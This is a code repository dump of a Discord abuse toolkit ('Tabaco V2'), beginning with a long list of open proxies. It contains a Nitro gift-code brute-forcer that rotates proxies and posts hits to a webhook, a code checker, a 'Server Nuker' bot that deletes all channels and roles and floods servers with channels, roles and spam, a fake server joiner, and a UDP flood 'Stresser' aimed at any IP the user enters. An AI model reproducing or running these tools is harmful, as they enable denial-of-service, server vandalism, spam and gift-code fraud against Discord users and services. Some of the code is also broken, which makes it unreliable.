| 185.190.38.21:8080 1032 | 219.151.157.130:3128 1033 | 109.254.101.214:9090 1034 | 103.204.119.186:8080 1035 | 201.238.242.38:999 1036 | 27.123.1.46:3128 1037 | 35.246.142.152:80 1038 | 176.236.232.66:9090 1039 | 209.91.184.157:80 1040 | 110.232.66.209:808 1041 | 203.189.89.158:8080 1042 | 181.129.98.146:8080 1043 | 182.52.229.165:8080 1044 | 118.117.188.131:3256 1045 | 45.234.187.255:8080 1046 | 36.94.183.153:8080 1047 | 103.60.173.6:8080 1048 | 91.230.199.174:61440 1049 | 201.217.245.229:49160 1050 | 83.171.103.67:8080 1051 | 115.124.73.33:9890 1052 | 103.14.198.209:82 1053 | 168.196.211.10:55443 1054 | 59.120.147.82:3128 1055 | 190.2.210.123:999 1056 | 96.90.234.245:80 1057 | 103.161.164.105:8181 1058 | 197.211.45.4:10000 1059 | 185.100.196.56:8080 1060 | 91.197.10.22:8888 1061 | 62.210.69.176:5566 1062 | 186.233.98.173:23500 1063 | 175.106.11.73:7878 1064 | 109.254.92.67:9090 1065 | 222.74.202.238:8080 1066 | 46.5.252.54:3128 1067 | 187.32.76.97:3128 1068 | 185.28.250.95:8080 1069 | 203.76.124.35:8080 1070 | 78.188.142.249:9090 1071 | 94.141.117.1:8080 1072 | 209.45.111.198:45729 1073 | 77.233.5.68:55443 1074 | 222.74.202.229:8080 1075 | 222.74.202.245:8080 1076 | 195.191.182.103:8070 1077 | 176.235.83.113:8080 1078 | 146.59.178.57:3128 1079 | 222.74.202.229:80 1080 | 197.155.158.22:80 1081 | 103.83.178.202:8080 1082 | 36.67.82.146:8000 1083 | 222.74.202.230:8080 1084 | 45.70.238.180:999 1085 | 85.26.146.169:80 1086 | 213.6.66.66:48687 1087 | 80.93.213.210:3133 1088 | 66.96.239.161:8080 1089 | 173.246.129.9:80 1090 | 103.199.156.145:40049 1091 | 222.74.202.245:9999 1092 | 165.73.129.149:56975 1093 | 47.89.153.213:80 1094 | 196.214.185.85:80 1095 | 103.4.164.204:8080 1096 | 46.229.67.198:47437 1097 | 212.174.11.111:9090 1098 | 190.196.176.5:60080 1099 | 81.33.4.214:61711 1100 | 202.141.233.66:8080 1101 | 23.101.58.2:3128 1102 | 94.54.208.189:80 1103 | 216.155.89.66:999 1104 | 85.216.127.189:3128 1105 | 219.92.40.123:8080 1106 | 193.242.151.44:8080 1107 | 201.102.190.70:8080 1108 | 101.205.120.102:80 1109 | 187.237.121.46:80 1110 | 138.68.60.8:3128 1111 | 61.216.43.102:8080 1112 | 111.92.240.134:30598 1113 | 185.120.217.37:8080 1114 | 45.71.201.122:999 1115 | 89.140.125.17:80 1116 | 178.88.185.2:3128 1117 | 195.154.207.153:80 1118 | 222.74.202.239:80 1119 | 200.105.215.18:33630 1120 | 118.117.188.85:3256 1121 | 212.175.118.178:8080 1122 | 47.115.156.64:3128 1123 | 201.157.252.38:9999 1124 | 45.181.190.2:8090 1125 | 218.14.108.53:8060 1126 | 182.16.171.65:43188 1127 | 146.120.168.237:8181 1128 | 191.242.187.59:8080 1129 | 1.10.187.237:8080 1130 | 51.81.82.175:80 1131 | 1.186.80.68:80 1132 | 46.5.252.50:3128 1133 | 190.217.1.101:32192 1134 | 20.82.200.229:3128 1135 | 5.39.17.96:80 1136 | 8.208.91.118:8800 1137 | 88.99.134.61:8080 1138 | 45.156.31.26:9090 1139 | 34.138.225.120:8888 1140 | 150.129.207.84:30093 1141 | 117.3.136.218:55443 1142 | 180.250.102.194:8080 1143 | 124.40.245.178:3128 1144 | 198.27.74.6:9300 1145 | 195.178.56.33:8080 1146 | 182.84.144.76:3256 1147 | 27.105.130.93:8080 1148 | 91.224.182.49:8080 1149 | 163.47.208.161:8080 1150 | 36.92.153.95:80 1151 | 183.213.28.64:3128 1152 | 116.202.165.119:3128 1153 | 35.245.254.223:3128 1154 | 122.15.211.124:80 1155 | 200.125.169.101:999 1156 | 109.70.189.70:56408 1157 | 180.148.4.194:8080 1158 | 204.199.109.154:999 1159 | 193.37.152.92:3128 1160 | 81.95.230.211:3128 1161 | 124.41.211.196:31120 1162 | 37.17.9.28:44938 1163 | 94.199.2.235:8080 1164 | 118.117.188.196:3256 1165 | 91.93.73.226:7070 1166 | 161.35.70.249:3128 1167 | 81.211.36.162:8080 1168 | 183.91.0.121:3128 1169 | 175.101.80.134:8080 1170 | 120.28.57.114:8080 1171 | 212.174.11.110:9090 1172 | 90.189.110.170:3128 1173 | 78.46.251.251:80 1174 | 213.157.47.38:8080 1175 | 154.113.69.154:8080 1176 | 79.119.155.137:53281 1177 | 35.180.70.8:9300 1178 | 174.32.108.254:87 1179 | 91.93.73.229:7070 1180 | 116.206.58.157:8181 1181 | 124.219.176.139:39589 1182 | 77.236.237.241:1256 1183 | 118.117.188.9:3256 1184 | 201.217.55.97:8080 1185 | 31.128.75.116:8080 1186 | 222.74.202.240:9999 1187 | 94.232.11.178:46449 1188 | 222.74.202.238:8081 1189 | 34.118.117.240:80 1190 | 91.93.156.130:8080 1191 | 103.1.184.238:3128 1192 | 103.76.12.42:8181 1193 | 165.73.128.125:56975 1194 | 36.255.86.114:84 1195 | 192.241.140.214:3128 1196 | 3.20.236.208:49205 1197 | 45.71.114.154:999 1198 | 20.88.192.37:3128 1199 | 89.111.105.105:41258 1200 | 79.143.87.138:9090 1201 | 43.224.10.30:6666 1202 | 223.27.194.66:63141 1203 | 219.92.40.123:80 1204 | 95.217.34.209:3128 1205 | 134.3.255.6:8080 1206 | 190.109.121.1:999 1207 | 05.10.27.146:3128 1208 | 190.52.194.122:999 1209 | 111.225.152.159:3256 1210 | 158.69.71.69:9300 1211 | 123.231.221.178:8080 1212 | 23.92.29.41:8118 1213 | 37.49.127.235:8080 1214 | 94.28.30.252:8080 1215 | 8.208.91.118:8081 1216 | 222.186.30.70:808 1217 | 189.84.122.34:8080 1218 | 47.254.126.34:1088 1219 | 103.14.198.169:83 1220 | 161.35.70.249:8080 1221 | 124.106.230.55:8080 1222 | 105.112.191.250:3128 1223 | 47.101.56.89:8085 1224 | 179.56.196.245:999 1225 | 222.165.221.12:58687 1226 | 175.176.185.106:3129 1227 | 43.241.131.105:8080 1228 | 49.231.200.212:8080 1229 | 52.78.172.171:80 1230 | 89.249.82.33:8090 1231 | 46.5.252.58:8080 1232 | 93.170.97.160:9999 1233 | 45.172.111.12:999 1234 | 203.142.69.67:8080 1235 | 201.63.80.226:80 1236 | 135.181.71.29:8080 1237 | 121.139.218.165:31409 1238 | 179.106.168.2:43345 1239 | 201.249.161.51:999 1240 | 118.117.188.199:3256 1241 | 103.216.147.65:8080 1242 | 91.89.89.13:8080 1243 | 1.224.161.60:8081 1244 | 196.216.215.11:56975 1245 | 88.199.164.140:8081 1246 | 177.8.113.61:50297 1247 | 62.252.146.74:8080 1248 | 78.111.97.182:3142 1249 | 195.9.173.38:63141 1250 | 150.129.250.28:33846 1251 | 64.124.38.126:8080 1252 | 5.10.27.146:3128 1253 | 203.223.34.2:8090 1254 | 78.92.231.44:55443 1255 | 43.255.113.232:82 1256 | 92.253.232.16:8080 1257 | 118.97.164.19:8080 1258 | 138.122.7.33:32192 1259 | 125.163.161.250:8080 1260 | 36.37.180.59:65205 1261 | 103.144.77.212:8083 1262 | 123.27.3.246:39915 1263 | 36.66.172.121:39810 1264 | 93.117.72.27:43631 1265 | 96.2.228.18:8080 1266 | 18.189.31.87:80 1267 | 185.142.67.23:8080 1268 | 51.77.123.244:80 1269 | 110.78.22.40:8080 1270 | 119.93.234.41:41731 1271 | 170.239.180.58:999 1272 | 43.255.113.232:8082 1273 | 176.9.119.170:8080 1274 | 182.253.191.132:8080 1275 | 94.199.2.230:8080 1276 | 45.172.111.35:999 1277 | 183.88.5.9:8080 1278 | 167.71.5.83:3128 1279 | 46.5.252.52:8080 1280 | 181.40.122.102:8080 1281 | 80.78.237.2:55443 1282 | 193.68.57.81:3128 1283 | 118.179.173.253:40836 1284 | 5.59.136.230:8080 1285 | 88.255.234.192:80 1286 | 188.168.56.82:55443 1287 | 91.240.97.69:8080 1288 | 52.23.129.250:80 1289 | 117.239.240.202:53281 1290 | 201.46.28.222:63238 1291 | 191.97.19.57:999 1292 | 66.248.217.9:8080 1293 | 83.111.183.37:80 1294 | 45.112.124.133:8080 1295 | 202.46.38.11:8080 1296 | 183.91.0.124:3128 1297 | 77.46.142.150:8080 1298 | 58.209.234.201:3389 1299 | 8.208.91.118:81 1300 | 222.128.60.203:1080 1301 | 178.216.2.229:8080 1302 | 91.192.2.168:53281 1303 | 190.109.6.113:999 1304 | 193.86.229.230:8080 1305 | 103.146.30.178:8080 1306 | 91.93.73.228:7070 1307 | 194.233.73.106:443 1308 | 190.52.198.2:999 1309 | 200.155.139.242:3128 1310 | 79.127.56.148:8080 1311 | 8.208.91.118:8000 1312 | 110.232.78.55:55667 1313 | 50.206.25.110:80 1314 | 37.230.147.206:8080 1315 | 61.150.96.27:36880 1316 | 177.87.168.97:53281 1317 | 182.253.108.186:8080 1318 | 36.67.89.179:65205 1319 | 182.84.144.4:3256 1320 | 190.109.168.217:8080 1321 | 36.94.13.63:3128 1322 | 119.18.152.210:3127 1323 | 124.204.33.162:8000 1324 | 36.94.161.219:8080 1325 | 136.243.81.120:8080 1326 | 196.27.106.112:8080 1327 | 36.67.25.137:8080 1328 | 190.217.1.89:32192 1329 | 201.143.252.172:8080 1330 | 43.255.113.232:8081 1331 | 190.97.254.114:8080 1332 | 182.48.245.34:80 1333 | 190.52.129.39:8080 1334 | 103.14.198.217:83 1335 | 45.7.177.197:34234 1336 | 122.154.69.17:80 1337 | 81.91.144.190:55443 1338 | 95.208.208.230:8080 1339 | 222.74.202.230:9999 1340 | 203.177.133.235:8080 1341 | 103.14.198.129:84 1342 | 36.89.190.85:8080 1343 | 201.20.105.198:8080 1344 | 203.190.2.181:8080 1345 | 91.186.102.169:8082 1346 | 213.230.69.193:3128 1347 | 189.196.46.2:999 1348 | 91.203.36.102:45551 1349 | 200.223.187.130:8080 1350 | 190.90.252.201:999 1351 | 209.97.150.167:8080 1352 | 188.133.153.201:1256 1353 | 122.3.41.154:8090 1354 | 103.73.75.69:8080 1355 | 103.52.210.237:80 1356 | 61.7.138.169:8080 1357 | 113.96.223.239:4002 1358 | 190.232.50.10:999 1359 | 101.132.186.175:9090 1360 | 204.199.84.229:8090 1361 | 77.195.143.92:80 1362 | 36.67.57.45:30066 1363 | 93.86.63.73:8080 1364 | 47.52.105.162:6666 1365 | 91.216.66.70:32306 1366 | 200.29.111.215:999 1367 | 217.8.51.200:3128 1368 | 45.6.228.158:8080 1369 | 104.248.249.47:3122 1370 | 190.119.211.74:8080 1371 | 60.216.20.213:8001 1372 | 180.180.218.250:8080 1373 | 36.92.189.66:8080 1374 | 180.179.98.22:3128 1375 | 84.204.40.155:8080 1376 | 36.94.142.163:8000 1377 | 190.2.213.129:999 1378 | 41.193.14.5:3128 1379 | 88.198.50.103:8080 1380 | 103.108.57.9:3127 1381 | 14.97.2.110:80 1382 | 66.96.253.234:8080 1383 | 183.88.2.153:8080 1384 | 88.255.234.197:80 1385 | 172.107.227.2:443 1386 | 138.97.200.207:8080 1387 | 176.236.178.98:9090 1388 | 202.164.152.233:8080 1389 | 51.159.24.172:3163 1390 | 27.147.209.215:8080 1391 | 80.87.217.6:8080 1392 | 58.97.193.228:55443 1393 | 104.244.75.218:8080 1394 | 47.254.90.125:8800 1395 | 5.56.134.237:55963 1396 | 159.65.5.141:65534 1397 | 1.186.83.4:80 1398 | 58.97.72.83:8080 1399 | 144.48.112.34:8080 1400 | 223.241.77.19:3256 1401 | 85.112.74.4:8080 1402 | 222.127.16.230:8080 1403 | 113.160.224.224:55443 1404 | 121.230.211.247:3256 1405 | 223.241.77.72:3256 1406 | 103.166.38.1:8080 1407 | 103.36.100.248:8000 1408 | 177.152.99.239:8083 1409 | 58.212.42.15:3256 1410 | 49.0.39.10:8080 1411 | 138.255.240.66:41466 1412 | 190.13.82.102:999 1413 | 186.96.110.154:999 1414 | 147.75.113.227:8080 1415 | 114.5.199.200:8182 1416 | 223.241.77.97:3256 1417 | 138.121.216.137:8083 1418 | 191.242.189.13:8080 1419 | 1.0.205.87:8080 1420 | 58.212.41.98:3256 1421 | 125.62.213.18:84 1422 | 200.58.170.65:999 1423 | 190.120.249.246:999 1424 | 62.133.168.72:55443 1425 | 117.94.222.49:3256 1426 | 78.30.198.160:8080 1427 | 170.83.108.69:8080 1428 | 111.68.26.237:8080 1429 | 139.5.132.245:8080 1430 | 171.233.151.214:55443 1431 | 190.92.9.162:999 1432 | 190.61.37.171:999 1433 | 185.190.38.1:8080 1434 | 103.168.44.3:3127 1435 | 185.34.22.225:37879 1436 | 45.64.255.104:8080 1437 | 160.238.242.42:8080 1438 | 177.87.174.21:53281 1439 | 177.87.174.4:53281 1440 | 72.224.119.193:8080 1441 | 41.190.92.84:48515 1442 | 103.57.11.106:55443 1443 | 103.14.198.234:84 1444 | 177.190.197.28:8080 1445 | 170.82.37.161:999 1446 | 118.70.67.161:8080 1447 | 109.167.141.137:8080 1448 | 89.204.214.142:8080 1449 | 200.24.132.195:999 1450 | 103.131.16.105:8080 1451 | 41.79.191.183:80 1452 | 203.189.229.146:8080 1453 | 96.95.164.41:3128 1454 | 111.118.128.140:41344 1455 | 185.175.119.206:36442 1456 | 115.124.76.130:8080 1457 | 103.206.253.162:8080 1458 | 103.155.198.50:8080 1459 | 103.78.252.30:8080 1460 | 115.75.35.12:42108 1461 | 103.219.112.178:8080 1462 | 77.28.97.34:48458 1463 | 43.229.252.28:53281 1464 | 103.100.84.23:8080 1465 | 103.11.106.174:8181 1466 | 168.90.100.247:8080 1467 | 85.198.185.26:8080 1468 | 131.100.51.1:999 1469 | 185.110.28.228:8080 1470 | 179.49.114.95:999 1471 | 77.28.96.196:56145 1472 | 117.216.137.45:3127 1473 | 168.181.196.76:8080 1474 | 175.106.10.227:7878 1475 | 103.152.101.250:8080 1476 | 103.152.101.241:8080 1477 | 103.160.56.126:8080 1478 | 103.157.249.106:8080 1479 | 187.216.93.20:55443 1480 | 77.120.92.73:8080 1481 | 200.69.210.59:80 1482 | 212.112.113.252:80 1483 | 27.116.63.120:7999 1484 | 190.186.1.46:55830 1485 | 179.49.160.190:999 1486 | 223.241.77.145:3256 1487 | 82.65.187.32:80 1488 | 123.171.42.145:3256 1489 | 194.44.87.245:8080 1490 | 111.92.166.122:8089 1491 | 109.254.125.212:9090 1492 | 202.191.108.42:8080 1493 | 180.180.170.188:8080 1494 | 185.216.25.170:3128 1495 | 103.153.232.3:8080 1496 | 103.153.232.1:8080 1497 | 129.226.52.93:443 1498 | 120.42.133.79:3256 1499 | 14.170.154.10:8080 1500 | 213.142.148.161:8080 1501 | 45.228.77.244:999 1502 | 103.14.198.145:84 1503 | 160.19.232.85:3128 1504 | 181.10.129.85:8080 1505 | 103.151.227.34:8080 1506 | 119.110.75.30:63123 1507 | 223.241.77.37:3256 1508 | 212.100.84.10:8080 1509 | 103.53.76.82:8080 1510 | 103.115.164.99:8080 1511 | 3.23.44.179:80 1512 | 170.83.60.124:55443 1513 | 41.180.68.195:8080 1514 | 103.82.233.2:53281 1515 | 103.148.192.75:8080 1516 | 103.21.170.230:3128 1517 | 158.140.167.148:53281 1518 | 103.14.198.178:83 1519 | 190.186.18.161:999 1520 | 45.230.169.10:999 1521 | 103.14.199.225:83 1522 | 103.78.252.113:8080 1523 | 103.7.27.186:8080 1524 | 45.236.104.179:999 1525 | 45.236.104.180:999 1526 | 197.245.230.122:41026 1527 | 103.28.148.203:8080 1528 | 103.163.217.141:10000 1529 | 103.163.217.155:10000 1530 | 103.124.111.33:8080 1531 | 103.90.145.196:8080 1532 | 159.192.147.186:8080 1533 | 47.75.254.142:8888 1534 | 101.255.171.105:8080 1535 | 155.93.96.210:8080 1536 | 185.58.18.149:8080 1537 | 185.190.38.150:8080 1538 | 170.79.97.186:8080 1539 | 190.61.90.141:999 1540 | 124.106.57.182:8080 1541 | 182.93.10.83:8090 1542 | 187.1.57.206:20183 1543 | 45.185.162.130:999 1544 | 45.174.87.18:999 1545 | 189.50.10.55:8080 1546 | 103.209.230.129:8080 1547 | 203.33.113.149:80 1548 | 203.33.113.25:80 1549 | 203.33.113.79:80 1550 | 103.148.39.38:82 1551 | 177.10.162.222:8080 1552 | 103.149.143.2:8080 1553 | 45.173.6.145:999 1554 | 102.141.197.17:8080 1555 | 177.11.84.233:8080 1556 | 202.146.232.179:8888 1557 | 78.30.230.117:50932 1558 | 176.111.73.57:8081 1559 | 181.224.162.205:999 1560 | 187.190.115.139:9991 1561 | 195.162.71.112:8080 1562 | 117.54.106.241:8080 1563 | 170.239.222.84:8080 1564 | 131.0.4.254:8080 1565 | 103.250.166.12:6666 1566 | 119.110.209.94:3128 1567 | 81.140.102.191:32231 1568 | 202.62.95.101:8080 1569 | 223.241.77.253:3256 1570 | 182.53.197.156:43060 1571 | 183.82.111.34:80 1572 | 175.101.16.137:84 1573 | 109.73.181.197:49759 1574 | 190.95.134.72:999 1575 | 200.119.218.89:999 1576 | 49.0.41.81:38235 1577 | 104.238.195.10:80 1578 | 186.64.95.1:999 1579 | 195.91.221.230:55443 1580 | 158.255.51.213:61468 1581 | 131.100.51.250:999 1582 | 103.78.252.65:8080 1583 | 190.216.36.30:8080 1584 | 200.32.80.110:8080 1585 | 43.225.186.21:80 1586 | 182.180.48.62:8085 1587 | 195.158.81.121:55443 1588 | 103.209.178.172:34751 1589 | 1590 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/NG/main.py: -------------------------------------------------------------------------------- 1 | import os, requests, random, threading, json, time, multiprocessing 2 | from colorama import Fore 3 | 4 | 5 | def center(var:str, space:int=None): 6 | if not space: 7 | space = (os.get_terminal_size().columns - len(var.splitlines()[int(len(var.splitlines())/2)])) / 2 8 | 9 | return "\n".join((' ' * int(space)) + var for var in var.splitlines()) 10 | 11 | class Console(): 12 | def ui(self): 13 | os.system(f'' if os.name == "nt" else "clear") 14 | print(center(f"""\n\n 15 | █""").replace('█', Fore.GREEN+"█"+Fore.RESET).replace('~', Fore.GREEN+"~"+Fore.RESET).replace('-', Fore.GREEN+"-"+Fore.RESET)) 16 | 17 | def printer(self, color, status, code): 18 | threading.Lock().acquire() 19 | print(f"{color} {status} > {Fore.RESET}discord.gift/{code}") 20 | 21 | def proxies_count(self): 22 | proxies_list = 0 23 | with open('config/proxies.txt', 'r') as file: 24 | proxies = [line.strip() for line in file] 25 | 26 | for _ in proxies: 27 | proxies_list += 1 28 | 29 | return int(proxies_list) 30 | 31 | 32 | class Worker(): 33 | def random_proxy(self): 34 | with open('config/proxies.txt', 'r') as f: 35 | proxies = [line.strip() for line in f] 36 | 37 | return random.choice(proxies) 38 | 39 | def config(self, args, args2=False): 40 | with open('config/config.json', 'r') as conf: 41 | data = json.load(conf) 42 | 43 | if args2: 44 | return data[args][args2] 45 | else: 46 | return data[args] 47 | 48 | def run(self): 49 | self.code = "".join(random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890") for _ in range(16)) 50 | try: 51 | req = requests.get(f'https://discordapp.com/api/v6/entitlements/gift-codes/{self.code}?with_application=false&with_subscription_plan=true', proxies={'http': self.config("proxies")+'://'+self.random_proxy(),'https': self.config("proxies")+'://'+self.random_proxy()}, timeout=1) 52 | 53 | if req.status_code == 200: 54 | Console().printer(Fore.LIGHTGREEN_EX, " Valid ", self.code) 55 | open('results/hit.txt', 'a+').write(self.code+"\n") 56 | try: 57 | requests.post(Worker().config("webhook", "url"), json={"content": f"||@here|| **__New Valid Nitro !!__**\n\nhttps://discord.gift/{self.code}", "username": Worker().config("webhook", "username"), "avatar_url": Worker().config("webhook", "avatar")}) 58 | except: 59 | pass 60 | elif req.status_code == 404: 61 | Console().printer(Fore.LIGHTRED_EX, "Invalid", self.code) 62 | elif req.status_code == 429: 63 | Console().printer(Fore.LIGHTBLUE_EX, "RTlimit", self.code) 64 | else: 65 | Console().printer(Fore.LIGHTYELLOW_EX, " Retry ", self.code) 66 | 67 | except KeyboardInterrupt: 68 | Console().ui() 69 | threading.Lock().acquire() 70 | print(f"{Fore.LIGHTRED_EX} Stopped > {Fore.RESET}Nitro Gen Stopped by Keyboard Interrupt.") 71 | os.system('pause >nul') 72 | exit() 73 | except: 74 | Console().printer(Fore.LIGHTYELLOW_EX, " Retry ", self.code) 75 | 76 | if __name__ == "__main__": 77 | Console().ui() 78 | print(" "+Fore.GREEN + str(Console().proxies_count()) + Fore.RESET + " Total proxies loaded...\n\n") 79 | DNG = Worker() 80 | 81 | while True: 82 | if threading.active_count() <= int(Worker().config("thread")): 83 | threading.Thread(target=DNG.run(), args=()).start() 84 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/NG/results/hit.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/NitroCheck.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | import string 4 | 5 | print("This will take a few seconds..") 6 | print("If you see many *'s that means most are invalid or all are invalid") 7 | 8 | with open("tools/workedcodes.txt") as file: 9 | for line in file.readlines(): 10 | nitro = line.strip("\n") 11 | 12 | url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true" 13 | 14 | r = requests.get(url) 15 | 16 | if r.status_code == 200: 17 | print(f"\n\n Valid | {nitro}\n\n") 18 | else: 19 | print(f"*", end = "") 20 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/NitroGen.py: -------------------------------------------------------------------------------- 1 | import json 2 | import os 3 | 4 | os.system("color 2") 5 | 6 | # Read the configuration file 7 | with open('Tools/NG/config/config.json', 'r') as f: 8 | config = json.load(f) 9 | 10 | # Ask the user to input the webhook URL 11 | webhook_url = input("Enter the webhook URL: ") 12 | 13 | # Update the URL in the configuration file 14 | config["url"] = webhook_url 15 | 16 | # Write the updated configuration file 17 | with open('Tools/NG/config/config.json', 'w') as f: 18 | json.dump(config, f) 19 | 20 | # Ask the user if they want to run the script 21 | run_script = input("Do you want to run the script? (y/n) ") 22 | 23 | if run_script.lower() == "y": 24 | # Change directory to the NG folder 25 | os.chdir('Tools/NG') 26 | 27 | # Run the main.py script 28 | os.system('python main.py') -------------------------------------------------------------------------------- /Tabaco V2/Tools/Server Nuker.py: -------------------------------------------------------------------------------- 1 | import sys, discord, requests, json, threading, random, asyncio,aiohttp, time 2 | from discord.ext import commands 3 | import colorama 4 | from colorama import Fore, Style, Back 5 | from time import sleep 6 | from datetime import datetime 7 | 8 | now = datetime.now() 9 | ftime = now.strftime("%H:%M:%S") 10 | 11 | session = requests.Session() 12 | 13 | token = input("Token: ") 14 | prefix = input("Prefix: ") 15 | stats = input("Status: ") 16 | chan = input("Channel Name: ") 17 | spamdata = input("Spam content: ") 18 | rol = input("Spam Roles: ") 19 | webname = input("Spam Webhook names: ") 20 | amountss = 1000 21 | intents = discord.Intents().all() 22 | intents.message_content = True 23 | bot = commands.Bot(command_prefix=prefix, intents=intents) 24 | bot.remove_command("help") 25 | 26 | if bot: 27 | headers = { 28 | "Authorization": 29 | f"Bot {token}" 30 | } 31 | else: 32 | headers = { 33 | "Authorization": 34 | token 35 | } 36 | 37 | 38 | 39 | @bot.event 40 | async def on_ready(): 41 | await bot.change_presence(activity=discord.Game(stats)) 42 | print(""" 43 | ────────────────────────────────────────────────────────────────────────────────────────────────── 44 | ─██████████████──██████████████──██████████████────██████████████──██████████████──██████████████─ 45 | ─██░░░░░░░░░░██──██░░░░░░░░░░██──██░░░░░░░░░░██────██░░░░░░░░░░██──██░░░░░░░░░░██──██░░░░░░░░░░██─ 46 | ─██████░░██████──██░░██████░░██──██░░██████░░██────██░░██████░░██──██░░██████████──██░░██████░░██─ 47 | ─────██░░██──────██░░██──██░░██──██░░██──██░░██────██░░██──██░░██──██░░██──────────██░░██──██░░██─ 48 | ─────██░░██──────██░░██████░░██──██░░██████░░████──██░░██████░░██──██░░██──────────██░░██──██░░██─ 49 | ─────██░░██──────██░░░░░░░░░░██──██░░░░░░░░░░░░██──██░░░░░░░░░░██──██░░██──────────██░░██──██░░██─ 50 | ─────██░░██──────██░░██████░░██──██░░████████░░██──██░░██████░░██──██░░██──────────██░░██──██░░██─ 51 | ─────██░░██──────██░░██──██░░██──██░░██────██░░██──██░░██──██░░██──██░░██──────────██░░██──██░░██─ 52 | ─────██░░██──────██░░██──██░░██──██░░████████░░██──██░░██──██░░██──██░░██████████──██░░██████░░██─ 53 | ─────██░░██──────██░░██──██░░██──██░░░░░░░░░░░░██──██░░██──██░░██──██░░░░░░░░░░██──██░░░░░░░░░░██─ 54 | ─────██████──────██████──██████──████████████████──██████──██████──██████████████──██████████████─ 55 | ──────────────────────────────────────────────────────────────────────────────────────────────────1""") 56 | print("Commands - nuke,scc,sdc,sdr,scr,spam,swh") 57 | print(f"Logged in as {bot.user.name}") 58 | print(f"Prefix - {prefix}") 59 | print("Have fun!") 60 | 61 | def logo(): 62 | print(f"Logged in as {bot.user.name}") 63 | print(f"Prefix - {prefix}") 64 | 65 | @bot.command() 66 | async def scc(ctx): 67 | await ctx.message.delete() 68 | guild = ctx.guild.id 69 | def spc(i): 70 | json = { 71 | "name": i 72 | } 73 | session.post( 74 | f"https://discord.com/api/v9/guilds/{guild}/channels", 75 | headers=headers, 76 | json=json 77 | ) 78 | for i in range(500): 79 | threading.Thread( 80 | target=spc, 81 | args=(chan, ) 82 | ).start() 83 | 84 | @bot.command() 85 | async def scr(ctx): 86 | await ctx.message.delete() 87 | guild = ctx.guild.id 88 | def scrr(i): 89 | json = { 90 | "name": i 91 | } 92 | session.post( 93 | f"https://discord.com/api/v9/guilds/{guild}/roles", 94 | headers=headers, 95 | json=json 96 | ) 97 | for i in range(250): 98 | threading.Thread( 99 | target=scrr, 100 | args=(chan, ) 101 | ).start() 102 | 103 | @bot.command() 104 | async def sdr(ctx): 105 | await ctx.message.delete() 106 | for role in list(ctx.guild.roles): 107 | await role.delete() 108 | 109 | @bot.command() 110 | async def nuke(ctx): 111 | await ctx.message.delete() 112 | guild = ctx.guild.id 113 | for channel in list(ctx.guild.channels): 114 | await channel.delete() 115 | def cc(i): 116 | json = { 117 | "name": i 118 | } 119 | session.post( 120 | f"https://discord.com/api/v9/guilds/{guild}/channels", 121 | headers=headers, 122 | json=json 123 | ) 124 | for i in range(250): 125 | for channel in list(ctx.guild.channels): 126 | threading.Thread( 127 | target=channel_delete, 128 | args=(channel.id, ) 129 | ).start() 130 | for i in range(250): 131 | threading.Thread( 132 | target=cc, 133 | args=(chan, ) 134 | ).start() 135 | 136 | @bot.command() 137 | async def sdc(ctx): 138 | for channel in list(ctx.guild.channels): 139 | await channel.delete() 140 | 141 | @bot.command() 142 | async def spam(ctx): 143 | await ctx.message.delete() 144 | amountspam = 1000 145 | for i in range(amountspam): 146 | for channel in ctx.guild.channels: 147 | await channel.send(spamdata) 148 | 149 | @bot.command() 150 | async def swh(ctx): 151 | await ctx.message.delete() 152 | amountspam = 10000 153 | for i in range(amountspam): 154 | for webhook in ctx.guild.webhooks: 155 | await webhook.send(spamdata) 156 | 157 | @bot.event 158 | async def on_guild_channel_create(channel): 159 | try: 160 | webhook = await channel.create_webhook(name=webname) 161 | for i in range(10000): 162 | await webhook.send(spamdata) 163 | except: 164 | print("Ratelimited") 165 | 166 | 167 | bot.run(token) 168 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/ServerJoiner.py: -------------------------------------------------------------------------------- 1 | import os 2 | import discord 3 | import time 4 | 5 | banner1 = (f"""""") 6 | text = "Server Joiner\n " 7 | x = banner1 + text * 1 8 | print("\033[32m" + x + "\033[0m") 9 | 10 | b = "\033[32m[+] \033[0m" 11 | c = "\033[32m[Input] > \033[0m" 12 | 13 | print('') 14 | print('Input your Discord Server Url') 15 | print('') 16 | discordurl = input(str(c)) 17 | 18 | tokens = 0 19 | token_list = "Tools/WorkedTokens.txt" # Updated path to tokens.txt 20 | 21 | with open(token_list, "r") as file: 22 | token_lines = file.read().splitlines() 23 | 24 | if len(token_lines) == 0: 25 | print("There's nothing in the tokens file.") 26 | else: 27 | num_tokens = len(token_lines) 28 | for i in range(num_tokens): 29 | tokens += 1 30 | print(str(b) + "| New token joined | " + str(tokens) + " joins |") 31 | time.sleep(0.01) 32 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Stresser.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import random 4 | import socket 5 | 6 | 7 | 8 | os.system('cls') 9 | 10 | print("\033[1;32m") 11 | 12 | connect = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 13 | print("WARNING USE AT UR OWN RISK THIS IS CODE SENDING PACKETS FROM UR COMPUTER IT WILL LAG U ") 14 | 15 | try: 16 | size = int(input("Size> ")) 17 | attack = random._urandom(size) 18 | ip = input("IP> ") 19 | port = int(input("port> ")) 20 | print(" ") 21 | print("Launching Attack") 22 | print(" ") 23 | except SyntaxError: 24 | print(" ") 25 | exit("\033[1;34m ERROR \033[1;m") 26 | except NameError: 27 | print(" ") 28 | exit("\033[1;34m Invalid Input \033[1;m") 29 | except KeyboardInterrupt: 30 | print(" ") 31 | exit("\033[1;34m [-]Canceled By User \033[1;m") 32 | except ImportError: 33 | print(" ") 34 | exit("\033[1;34m [-]Install python 2.7.15") 35 | 36 | 37 | while True: 38 | try: 39 | connect.sendto(attack, (ip, port)) 40 | print(" Heavy Attack sending ===>") 41 | except KeyboardInterrupt: 42 | print(" ") 43 | exit("\033[1;34m [-]Canceled By User \033[1;m") 44 | except ImportError: 45 | print(" ") 46 | exit("\033[1;34m [-]Install python 2.7.15") 47 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Token 